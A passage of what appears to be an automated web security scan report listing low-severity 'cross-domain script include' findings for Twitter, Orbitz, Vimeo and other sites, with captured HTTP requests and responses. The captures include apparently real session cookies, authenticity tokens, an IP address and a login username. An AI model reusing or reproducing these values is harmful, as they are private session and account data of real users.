<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<td>
<script type="text/javascript"
src="https://api-secure.recaptcha.net/challenge?k=6LfbTAAAAAAAAE0hk8Vnfd1THHnn9lJuow6fgulO">
</script>
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.348. https://twitter.com/sessions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/sessions

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://api-secure.recaptcha.net/challenge?k=6LfbTAAAAAAAAE0hk8Vnfd1THHnn9lJuow6fgulO
https://si0.twimg.com/a/1296609216/javascripts/api.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

POST /sessions HTTP/1.1
Host: twitter.com
Connection: keep-alive
Referer: https://twitter.com/sessions
Cache-Control: max-age=0
Origin: https://twitter.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1296227675375304; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; __utmc=43838368; __utmv=43838368.lang%3A%20en; __utmb=43838368.3.10.1296663641; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6%250AC25vdGljZTAGOgpAdXNlZHsGOwlUOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1%250ANTg3NTBiY2U0NmNhODk%253D--fab0553612e262a6d5d29dd57d955d0f7cbb2852
Content-Length: 247

authenticity_token=7e8ce56b03e556aa82923dfa5d83a38f13f4c364&authenticity_token=7e8ce56b03e556aa82923dfa5d83a38f13f4c364&return_to_ssl=false&redirect_after_login=%2F&session%5Busername_or_email%5D=rtfm
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:23:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663829-8790-17902
ETag: "02137dc531737eb7cc0c473fa61d8e95"-gzip
Last-Modified: Wed, 02 Feb 2011 16:23:49 GMT
X-Runtime: 0.06714
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA%253D--4cc25c767355f06f9571f0a474fa606cf2805ac1; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 12643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<td>
<script type="text/javascript"
src="https://api-secure.recaptcha.net/challenge?k=6LfbTAAAAAAAAE0hk8Vnfd1THHnn9lJuow6fgulO">
</script>
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.349. https://twitter.com/signup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/signup

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://api-secure.recaptcha.net/challenge?k=6LfbTAAAAAAAAE0hk8Vnfd1THHnn9lJuow6fgulO&lang=en
https://si0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
https://si1.twimg.com/a/1296609216/javascripts/captcha_dialog.js?1296611745
https://si1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
https://si3.twimg.com/a/1296609216/javascripts/api.js?1296611745
https://si3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
https://si3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
https://si3.twimg.com/a/1296609216/javascripts/signup.js?1296611745
https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:23:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663829-89200-7354
ETag: "ed0dc6e25fe910272a7490b6f79f8e91"
Last-Modified: Wed, 02 Feb 2011 16:23:49 GMT
X-Runtime: 0.06475
Content-Type: text/html; charset=utf-8
Content-Length: 39430
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="https://si3.twimg.com/a/1296609216/javascripts/signup.js?1296611745" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/captcha_dialog.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://api-secure.recaptcha.net/challenge?k=6LfbTAAAAAAAAE0hk8Vnfd1THHnn9lJuow6fgulO&lang=en"></script>
...[SNIP]...

18.350. https://twitter.com/tos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/tos

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://si0.twimg.com/a/1296609216/javascripts/api.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:23:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663829-54210-41524
ETag: "811349ef198e540e50099738f656b516"
Last-Modified: Wed, 02 Feb 2011 16:23:49 GMT
X-Runtime: 0.04445
Content-Type: text/html; charset=utf-8
Content-Length: 30526
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.351. http://updates.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://updates.orbitz.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA9rhyhXZG9LOrh9Qs8k4ZzxSAPUKRPcIABy5HtXnCZ-yUwxKVwBSSL2GOR1iH0F1wQs8vex5e4Az2UQ
http://www.google-analytics.com/urchin.js
http://www.google.com/coop/cse/brand?form=searchbox_008106643373581316187%3Ady0huad0eau

Request

GET / HTTP/1.1
Host: updates.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 02 Feb 2011 15:42:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: traveler_update_visitor=C108D6A5A5D4BD8; path=/; expires=Tue, 02 Feb 2016 15:42:34 GMT
Set-Cookie: traveler_update_session=BAh7CToOcmV0dXJuX3RvIgYvOhFsYXN0X3JlcXVlc3RABjoQbGFzdF92aWV3%250AZWRABiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--1848cb98c769e595ff92d0c71ba7b529ea2e7b8c; path=/
Status: 200 OK
X-Runtime: 0.04863
ETag: "b34818a85b696911e7d99114397715e5"
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 32599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta htt
...[SNIP]...
</script>

<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA9rhyhXZG9LOrh9Qs8k4ZzxSAPUKRPcIABy5HtXnCZ-yUwxKVwBSSL2GOR1iH0F1wQs8vex5e4Az2UQ" type="text/javascript"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_008106643373581316187%3Ady0huad0eau"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.352. http://updates.orbitz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://updates.orbitz.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/urchin.js
http://www.google.com/coop/cse/brand?form=searchbox_008106643373581316187%3Ady0huad0eau

Request

GET /favicon.ico HTTP/1.1
Host: updates.orbitz.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; traveler_update_visitor=B8AE8BD37C84AE1; traveler_update_session=BAh7CToOcmV0dXJuX3RvIgYvOhFsYXN0X3JlcXVlc3RABjoQbGFzdF92aWV3%250AZWRABiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--1848cb98c769e595ff92d0c71ba7b529ea2e7b8c; __utma=44634720.408317529.1296221482.1296342268.1296661619.3; __utmb=44634720; __utmc=44634720; __utmz=44634720.1296661619.3.3.utmccn=(referral)|utmcsr=burp|utmcct=/show/15|utmcmd=referral; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296661619090:ss=1296661619090

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.35
Date: Wed, 02 Feb 2011 15:46:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Runtime: 0.00149
Cache-Control: no-cache
Content-Length: 11444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_008106643373581316187%3Ady0huad0eau"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.353. http://updates.orbitz.com/flight_status previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://updates.orbitz.com
Path:	/flight_status

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/urchin.js
http://www.google.com/coop/cse/brand?form=searchbox_008106643373581316187%3Ady0huad0eau
http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=left&Params.richmedia=&channel=travelerupdate&dest=&sessionID=e6b95221cb7d0ead6d8a79365357cbad&CookieName=OSC&tile=129666135644044
http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=right&Params.richmedia=&channel=travelerupdate&dest=&sessionID=e6b95221cb7d0ead6d8a79365357cbad&CookieName=OSC&tile=129666135644044
http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=top&Params.richmedia=&channel=travelerupdate&dest=&sessionID=e6b95221cb7d0ead6d8a79365357cbad&CookieName=OSC&tile=129666135644044

Request

GET /flight_status HTTP/1.1
Host: updates.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 02 Feb 2011 15:42:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: traveler_update_visitor=AA38ABAD2706415; path=/; expires=Tue, 02 Feb 2016 15:42:36 GMT
Set-Cookie: traveler_update_session=BAh7CToOcmV0dXJuX3RvIhMvZmxpZ2h0X3N0YXR1czoRbGFzdF9yZXF1ZXN0%250AQAY6EGxhc3Rfdmlld2VkQAYiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--2e47e384fcf267e3ac43c1147866adf06a386ff2; path=/
Status: 200 OK
X-Runtime: 0.01429
ETag: "37da1b745a19284e2ca378d8687450da"
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 20350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta htt
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_008106643373581316187%3Ady0huad0eau"></script>
...[SNIP]...
<div class="ad"><script src="http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=top&Params.richmedia=&channel=travelerupdate&dest=&sessionID=e6b95221cb7d0ead6d8a79365357cbad&CookieName=OSC&tile=129666135644044" type="text/javascript"></script>
...[SNIP]...
<div class="ad"><script src="http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=left&Params.richmedia=&channel=travelerupdate&dest=&sessionID=e6b95221cb7d0ead6d8a79365357cbad&CookieName=OSC&tile=129666135644044" type="text/javascript"></script>
...[SNIP]...
<div class="ad"><script src="http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=right&Params.richmedia=&channel=travelerupdate&dest=&sessionID=e6b95221cb7d0ead6d8a79365357cbad&CookieName=OSC&tile=129666135644044" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.354. http://updates.orbitz.com/pos/ocom/coBrand/msn/orbitzmsn.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://updates.orbitz.com
Path:	/pos/ocom/coBrand/msn/orbitzmsn.css

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/urchin.js
http://www.google.com/coop/cse/brand?form=searchbox_008106643373581316187%3Ady0huad0eau

Request

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.35
Date: Wed, 02 Feb 2011 15:46:04 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 11271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_008106643373581316187%3Ady0huad0eau"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.355. http://vimeo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vimeo.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.vimeocdn.com/combine.php?type=js&version=e1aae&files=mootools.v1.11_jsmin,mootools_ext,lab,land,forage,share,moo_rainbow,embed,paginator&ssl=0
http://a.vimeocdn.com/js/global.js?e1aae
http://a.vimeocdn.com/p/1.0.2/js/player.core.opt.js?e1aae
http://ad.doubleclick.net/adj/5480.iac.vimeo/home_logged_out;clipid=;tile=1;sz=300x250;s=vm;ord=405854261?

Request

GET / HTTP/1.1
Host: vimeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Expires: Wed, 02 Feb 2011 03:42:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: uid=0; expires=Sat, 30-Jan-2021 15:42:42 GMT; path=/; domain=.vimeo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<script type="text/javascript" src="http://a.vimeocdn.com/combine.php?type=js&version=e1aae&files=mootools.v1.11_jsmin,mootools_ext,lab,land,forage,share,moo_rainbow,embed,paginator&ssl=0"></script>
<script type="text/javascript" src="http://a.vimeocdn.com/p/1.0.2/js/player.core.opt.js?e1aae"></script>
...[SNIP]...
480.iac.vimeo/home_logged_out;clipid=;tile=1;sz=300x250;s=vm;ord=405854261?" width="300" height="250" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no">
<script language="JavaScript" src="http://ad.doubleclick.net/adj/5480.iac.vimeo/home_logged_out;clipid=;tile=1;sz=300x250;s=vm;ord=405854261?" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://a.vimeocdn.com/js/global.js?e1aae"></script>
...[SNIP]...

18.356. http://webcache.googleusercontent.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webcache.googleusercontent.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019
http://www.millenniumhotels.com/inc/s_code.js
http://www.millenniumhotels.com/inc_cty/mbox.js

Request

Response

18.357. http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webreflection.blogspot.com
Path:	/2009/01/32-bytes-to-know-if-your-browser-is-ie.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://badge.facebook.com/badge/1070526700.33.897046733.js
http://embed.technorati.com/embed/bzftjmf2gh.js
http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.3site.eu/JPU/JPU.js
http://www.3site.eu/JSL/JSL.php
http://www.3site.eu/devpro/GoogleTranslator.js
http://www.3site.eu/devpro/JSHighLighter.js
http://www.3site.eu/devpro/bigdollar.js
http://www.3site.eu/devpro/blog.js
http://www.3site.eu/examples/jSmile.js
http://www.3site.eu/javascript/GuruMeditation.js
http://www.blogger.com/dyn-js/backlink.js?blogID=34454975&postID=2004340713960404802
http://www.blogger.com/static/v1/common/js/755007736-csitail.js
http://www.blogger.com/static/v1/v-js/1895108979-backlink_control.js
http://www.blogger.com/static/v1/v-js/979395223-backlink.js
http://www.google-analytics.com/urchin.js
http://www.ubuntu.com/files/countdown/display2.js

Request

GET /2009/01/32-bytes-to-know-if-your-browser-is-ie.html HTTP/1.1
Host: webreflection.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Wed, 02 Feb 2011 15:42:43 GMT
Date: Wed, 02 Feb 2011 15:42:43 GMT
Last-Modified: Tue, 01 Feb 2011 21:40:28 GMT
ETag: "ecd1217c-5cee-483a-b3c7-eb33fb2037fd"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://feeds.feedburner.com/WebReflection" />

<script type="text/javascript" src="http://www.3site.eu/JSL/JSL.php"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/bigdollar.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/JSHighLighter.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/blog.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/GoogleTranslator.js"></script>

<script type="text/javascript" src="http://www.3site.eu/JPU/JPU.js"></script>
<script type="text/javascript" src="http://www.3site.eu/javascript/GuruMeditation.js"></script>
<script type="text/javascript" src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www.3site.eu/examples/jSmile.js">
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.blogger.com/dyn-css/authorization.css?targetBlogID=34454975&zx=ecd1217c-5cee-483a-b3c7-eb33fb2037fd"/><script type="text/javascript" src="http://www.blogger.com/static/v1/v-js/979395223-backlink.js"></script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/v-js/1895108979-backlink_control.js"></script>
...[SNIP]...
<dl id="comments-block">
<script type="text/javascript" src="http://www.blogger.com/dyn-js/backlink.js?blogID=34454975&postID=2004340713960404802" charset="utf-8" defer="true">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

</div>

<script type="text/javascript" src="http://www.ubuntu.com/files/countdown/display2.js"></script>
...[SNIP]...
</ul>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
...[SNIP]...
</script>
